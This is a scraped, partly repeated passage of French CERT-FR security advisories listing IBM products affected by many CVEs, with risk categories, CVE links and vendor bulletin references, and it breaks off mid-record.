"description": "Sterling Connect:Direct Web Services versions 6.2.x ant\u00e9rieures \u00e0 6.2.0.25",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "AIX version 7.3 sans le correctif bind_fix27/73bind918.tar",
"product": {
"name": "AIX",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "VIOS version 3.1 sans le correctif bind_fix27/72bind918.tar",
"product": {
"name": "VIOS",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Application Server Liberty sans le correctif APAR PH63533",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cloud Pak System versions ant\u00e9rieures \u00e0 2.3.5.0 pour Power avec le correctif PH60195/PH61002",
"product": {
"name": "Cloud Pak System",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "AIX version 7.2 sans le correctif bind_fix27/72bind918.tar",
"product": {
"name": "AIX",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "VIOS version 4.1 sans le correctif bind_fix27/73bind918.tar",
"product": {
"name": "VIOS",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct Web Services versions 6.1.x ant\u00e9rieures \u00e0 6.1.0.26",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cloud Pak System versions ant\u00e9rieures \u00e0 2.3.4.1 pour Intel avec le correctif PH60195/PH61002",
"product": {
"name": "Cloud Pak System",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct Web Services versions 6.3.x ant\u00e9rieures \u00e0 6.3.0.11",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar User Behavior Analytics versions ant\u00e9rieures \u00e0 4.1.17",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "Les vuln\u00e9rabilit\u00e9s CVE-2024-47875 et CVE-2024-45801 n\u0027ont pas de correctif pour Sterling Connect:Direct Web Services versions 6.1.x et 6.2.x",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2024-37891",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37891"
},
{
"name": "CVE-2024-28849",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28849"
},
{
"name": "CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"name": "CVE-2024-4068",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4068"
},
{
"name": "CVE-2024-47831",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47831"
},
{
"name": "CVE-2024-4076",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4076"
},
{
"name": "CVE-2018-14040",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14040"
},
{
"name": "CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"name": "CVE-2024-34351",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34351"
},
{
"name": "CVE-2024-34069",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34069"
},
{
"name": "CVE-2024-1975",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-1975"
},
{
"name": "CVE-2024-0760",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0760"
},
{
"name": "CVE-2024-1737",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-1737"
},
{
"name": "CVE-2024-45590",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45590"
},
{
"name": "CVE-2024-43796",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43796"
},
{
"name": "CVE-2018-20676",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-20676"
},
{
"name": "CVE-2024-1135",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-1135"
},
{
"name": "CVE-2024-46982",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46982"
},
{
"name": "CVE-2018-20677",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-20677"
},
{
"name": "CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"name": "CVE-2024-45801",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45801"
},
{
"name": "CVE-2024-7254",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7254"
},
{
"name": "CVE-2023-51775",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-51775"
},
{
"name": "CVE-2024-5569",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-5569"
},
{
"name": "CVE-2024-47875",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47875"
},
{
"name": "CVE-2018-14041",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14041"
},
{
"name": "CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"name": "CVE-2016-10735",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-10735"
},
{
"name": "CVE-2024-39338",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39338"
},
{
"name": "CVE-2024-34064",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34064"
},
{
"name": "CVE-2024-38816",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38816"
},
{
"name": "CVE-2024-22354",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22354"
},
{
"name": "CVE-2024-39689",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39689"
},
{
"name": "CVE-2023-26159",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26159"
},
{
"name": "CVE-2024-6345",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6345"
},
{
"name": "CVE-2019-8331",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-8331"
}
],
"links": [],
"reference": "CERTFR-2024-AVI-1015",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2024-11-22T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Injection de requ\u00eates ill\u00e9gitimes par rebond (CSRF)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2024-11-20",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7176657",
"url": "https://www.ibm.com/support/pages/node/7176657"
},
{
"published_at": "2024-11-20",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7176642",
"url": "https://www.ibm.com/support/pages/node/7176642"
},
{
"published_at": "2024-11-20",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7176660",
"url": "https://www.ibm.com/support/pages/node/7176660"
},
{
"published_at": "2024-11-18",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7176201",
"url": "https://www.ibm.com/support/pages/node/7176201"
},
{
"published_at": "2024-11-18",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7176391",
"url": "https://www.ibm.com/support/pages/node/7176391"
},
{
"published_at": "2024-11-18",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7176392",
"url": "https://www.ibm.com/support/pages/node/7176392"
},
{
"published_at": "2024-11-18",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7176386",
"url": "https://www.ibm.com/support/pages/node/7176386"
},
{
"published_at": "2024-11-18",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7176389",
"url": "https://www.ibm.com/support/pages/node/7176389"
},
{
"published_at": "2024-11-18",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7176451",
"url": "https://www.ibm.com/support/pages/node/7176451"
},
{
"published_at": "2024-11-18",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7176388",
"url": "https://www.ibm.com/support/pages/node/7176388"
},
{
"published_at": "2024-11-18",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7176205",
"url": "https://www.ibm.com/support/pages/node/7176205"
}
]
}
CERTFR-2024-AVI-1015
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Les vulnérabilités CVE-2024-47875 et CVE-2024-45801 n'ont pas de correctif pour Sterling Connect:Direct Web Services versions 6.1.x et 6.2.x
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | QRadar | QRadar Pre-Validation App versions antérieures à 2.0.1 | ||
| IBM | QRadar | QRadar Pulse App versions antérieures à 2.2.15 | ||
| IBM | WebSphere | WebSphere Hybrid Edition sans le correctif APAR PH63533 | ||
| IBM | Sterling Connect:Direct | Sterling Connect:Direct Web Services versions 6.2.x antérieures à 6.2.0.25 | ||
| IBM | AIX | AIX version 7.3 sans le correctif bind_fix27/73bind918.tar | ||
| IBM | VIOS | VIOS version 3.1 sans le correctif bind_fix27/72bind918.tar | ||
| IBM | WebSphere | WebSphere Application Server Liberty sans le correctif APAR PH63533 | ||
| IBM | Cloud Pak System | Cloud Pak System versions antérieures à 2.3.5.0 pour Power avec le correctif PH60195/PH61002 | ||
| IBM | AIX | AIX version 7.2 sans le correctif bind_fix27/72bind918.tar | ||
| IBM | VIOS | VIOS version 4.1 sans le correctif bind_fix27/73bind918.tar | ||
| IBM | Sterling Connect:Direct | Sterling Connect:Direct Web Services versions 6.1.x antérieures à 6.1.0.26 | ||
| IBM | Cloud Pak System | Cloud Pak System versions antérieures à 2.3.4.1 pour Intel avec le correctif PH60195/PH61002 | ||
| IBM | Sterling Connect:Direct | Sterling Connect:Direct Web Services versions 6.3.x antérieures à 6.3.0.11 | ||
| IBM | QRadar | QRadar User Behavior Analytics versions antérieures à 4.1.17 |
References
| Title | Publication Time | Tags | |||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "QRadar Pre-Validation App versions ant\u00e9rieures \u00e0 2.0.1",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Pulse App versions ant\u00e9rieures \u00e0 2.2.15",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Hybrid Edition sans le correctif APAR PH63533",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct Web Services versions 6.2.x ant\u00e9rieures \u00e0 6.2.0.25",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "AIX version 7.3 sans le correctif bind_fix27/73bind918.tar",
"product": {
"name": "AIX",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "VIOS version 3.1 sans le correctif bind_fix27/72bind918.tar",
"product": {
"name": "VIOS",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Application Server Liberty sans le correctif APAR PH63533",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cloud Pak System versions ant\u00e9rieures \u00e0 2.3.5.0 pour Power avec le correctif PH60195/PH61002",
"product": {
"name": "Cloud Pak System",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "AIX version 7.2 sans le correctif bind_fix27/72bind918.tar",
"product": {
"name": "AIX",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "VIOS version 4.1 sans le correctif bind_fix27/73bind918.tar",
"product": {
"name": "VIOS",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct Web Services versions 6.1.x ant\u00e9rieures \u00e0 6.1.0.26",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cloud Pak System versions ant\u00e9rieures \u00e0 2.3.4.1 pour Intel avec le correctif PH60195/PH61002",
"product": {
"name": "Cloud Pak System",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct Web Services versions 6.3.x ant\u00e9rieures \u00e0 6.3.0.11",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar User Behavior Analytics versions ant\u00e9rieures \u00e0 4.1.17",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "Les vuln\u00e9rabilit\u00e9s CVE-2024-47875 et CVE-2024-45801 n\u0027ont pas de correctif pour Sterling Connect:Direct Web Services versions 6.1.x et 6.2.x",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2024-37891",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37891"
},
{
"name": "CVE-2024-28849",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28849"
},
{
"name": "CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"name": "CVE-2024-4068",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4068"
},
{
"name": "CVE-2024-47831",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47831"
},
{
"name": "CVE-2024-4076",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4076"
},
{
"name": "CVE-2018-14040",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14040"
},
{
"name": "CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"name": "CVE-2024-34351",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34351"
},
{
"name": "CVE-2024-34069",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34069"
},
{
"name": "CVE-2024-1975",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-1975"
},
{
"name": "CVE-2024-0760",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0760"
},
{
"name": "CVE-2024-1737",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-1737"
},
{
"name": "CVE-2024-45590",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45590"
},
{
"name": "CVE-2024-43796",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43796"
},
{
"name": "CVE-2018-20676",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-20676"
},
{
"name": "CVE-2024-1135",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-1135"
},
{
"name": "CVE-2024-46982",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46982"
},
{
"name": "CVE-2018-20677",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-20677"
},
{
"name": "CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"name": "CVE-2024-45801",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45801"
},
{
"name": "CVE-2024-7254",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7254"
},
{
"name": "CVE-2023-51775",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-51775"
},
{
"name": "CVE-2024-5569",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-5569"
},
{
"name": "CVE-2024-47875",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47875"
},
{
"name": "CVE-2018-14041",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14041"
},
{
"name": "CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"name": "CVE-2016-10735",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-10735"
},
{
"name": "CVE-2024-39338",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39338"
},
{
"name": "CVE-2024-34064",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34064"
},
{
"name": "CVE-2024-38816",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38816"
},
{
"name": "CVE-2024-22354",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22354"
},
{
"name": "CVE-2024-39689",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39689"
},
{
"name": "CVE-2023-26159",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26159"
},
{
"name": "CVE-2024-6345",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6345"
},
{
"name": "CVE-2019-8331",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-8331"
}
],
"links": [],
"reference": "CERTFR-2024-AVI-1015",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2024-11-22T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Injection de requ\u00eates ill\u00e9gitimes par rebond (CSRF)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2024-11-20",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7176657",
"url": "https://www.ibm.com/support/pages/node/7176657"
},
{
"published_at": "2024-11-20",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7176642",
"url": "https://www.ibm.com/support/pages/node/7176642"
},
{
"published_at": "2024-11-20",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7176660",
"url": "https://www.ibm.com/support/pages/node/7176660"
},
{
"published_at": "2024-11-18",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7176201",
"url": "https://www.ibm.com/support/pages/node/7176201"
},
{
"published_at": "2024-11-18",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7176391",
"url": "https://www.ibm.com/support/pages/node/7176391"
},
{
"published_at": "2024-11-18",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7176392",
"url": "https://www.ibm.com/support/pages/node/7176392"
},
{
"published_at": "2024-11-18",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7176386",
"url": "https://www.ibm.com/support/pages/node/7176386"
},
{
"published_at": "2024-11-18",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7176389",
"url": "https://www.ibm.com/support/pages/node/7176389"
},
{
"published_at": "2024-11-18",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7176451",
"url": "https://www.ibm.com/support/pages/node/7176451"
},
{
"published_at": "2024-11-18",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7176388",
"url": "https://www.ibm.com/support/pages/node/7176388"
},
{
"published_at": "2024-11-18",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7176205",
"url": "https://www.ibm.com/support/pages/node/7176205"
}
]
}
CERTFR-2025-AVI-0337
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | Sterling | Sterling Connect:Direct Web Services versions 6.1.x antérieures à 6.1.0.28 | ||
| IBM | QRadar | QRadar Suite Software versions 1.1x.x.x antérieures à 1.11.2.x | ||
| IBM | Cloud Pak | Cloud Pak for Security versions 1.1x.x.x antérieures à 1.11.2.x | ||
| IBM | QRadar | SOAR QRadar Plugin App versions antérieures à 5.6.0 |
References
| Title | Publication Time | Tags | |||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Sterling Connect:Direct Web Services versions 6.1.x ant\u00e9rieures \u00e0 6.1.0.28",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Suite Software versions 1.1x.x.x ant\u00e9rieures \u00e0 1.11.2.x",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cloud Pak for Security versions 1.1x.x.x ant\u00e9rieures \u00e0 1.11.2.x",
"product": {
"name": "Cloud Pak",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "SOAR QRadar Plugin App versions ant\u00e9rieures \u00e0 5.6.0",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2024-42459",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42459"
},
{
"name": "CVE-2024-21235",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21235"
},
{
"name": "CVE-2024-6531",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6531"
},
{
"name": "CVE-2024-22201",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22201"
},
{
"name": "CVE-2023-1370",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1370"
},
{
"name": "CVE-2024-55565",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-55565"
},
{
"name": "CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"name": "CVE-2024-4068",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4068"
},
{
"name": "CVE-2020-35494",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35494"
},
{
"name": "CVE-2020-15250",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-15250"
},
{
"name": "CVE-2024-23944",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-23944"
},
{
"name": "CVE-2024-12797",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12797"
},
{
"name": "CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"name": "CVE-2024-21068",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21068"
},
{
"name": "CVE-2020-35496",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35496"
},
{
"name": "CVE-2024-21534",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21534"
},
{
"name": "CVE-2024-42460",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42460"
},
{
"name": "CVE-2024-56326",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56326"
},
{
"name": "CVE-2024-45813",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45813"
},
{
"name": "CVE-2025-24970",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24970"
},
{
"name": "CVE-2023-45133",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45133"
},
{
"name": "CVE-2025-21613",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21613"
},
{
"name": "CVE-2024-12798",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12798"
},
{
"name": "CVE-2023-25584",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25584"
},
{
"name": "CVE-2024-43796",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43796"
},
{
"name": "CVE-2025-22866",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22866"
},
{
"name": "CVE-2024-4067",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4067"
},
{
"name": "CVE-2024-29018",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29018"
},
{
"name": "CVE-2024-8184",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8184"
},
{
"name": "CVE-2025-1302",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1302"
},
{
"name": "CVE-2025-27152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
},
{
"name": "CVE-2024-21538",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21538"
},
{
"name": "CVE-2024-45336",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45336"
},
{
"name": "CVE-2024-48948",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-48948"
},
{
"name": "CVE-2024-0450",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0450"
},
{
"name": "CVE-2024-12801",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12801"
},
{
"name": "CVE-2018-18700",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-18700"
},
{
"name": "CVE-2024-47554",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47554"
},
{
"name": "CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"name": "CVE-2024-6763",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6763"
},
{
"name": "CVE-2024-45337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45337"
},
{
"name": "CVE-2024-7254",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7254"
},
{
"name": "CVE-2019-16163",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16163"
},
{
"name": "CVE-2024-56201",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56201"
},
{
"name": "CVE-2023-51775",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-51775"
},
{
"name": "CVE-2024-52798",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52798"
},
{
"name": "CVE-2024-47535",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47535"
},
{
"name": "CVE-2023-52428",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52428"
},
{
"name": "CVE-2024-10041",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10041"
},
{
"name": "CVE-2023-1972",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1972"
},
{
"name": "CVE-2025-26791",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-26791"
},
{
"name": "CVE-2024-10963",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10963"
},
{
"name": "CVE-2024-6119",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6119"
},
{
"name": "CVE-2023-25588",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25588"
},
{
"name": "CVE-2025-25193",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25193"
},
{
"name": "CVE-2020-35495",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35495"
},
{
"name": "CVE-2025-27789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27789"
},
{
"name": "CVE-2024-42461",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42461"
},
{
"name": "CVE-2024-29180",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29180"
},
{
"name": "CVE-2019-12972",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-12972"
},
{
"name": "CVE-2025-1094",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1094"
},
{
"name": "CVE-2023-25585",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25585"
},
{
"name": "CVE-2025-21614",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21614"
},
{
"name": "CVE-2025-21502",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21502"
},
{
"name": "CVE-2020-35507",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35507"
},
{
"name": "CVE-2020-35493",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35493"
},
{
"name": "CVE-2024-21217",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21217"
},
{
"name": "CVE-2018-12699",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-12699"
},
{
"name": "CVE-2024-57699",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57699"
}
],
"links": [],
"reference": "CERTFR-2025-AVI-0337",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-04-18T00:00:00.000000"
}
],
"risks": [
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
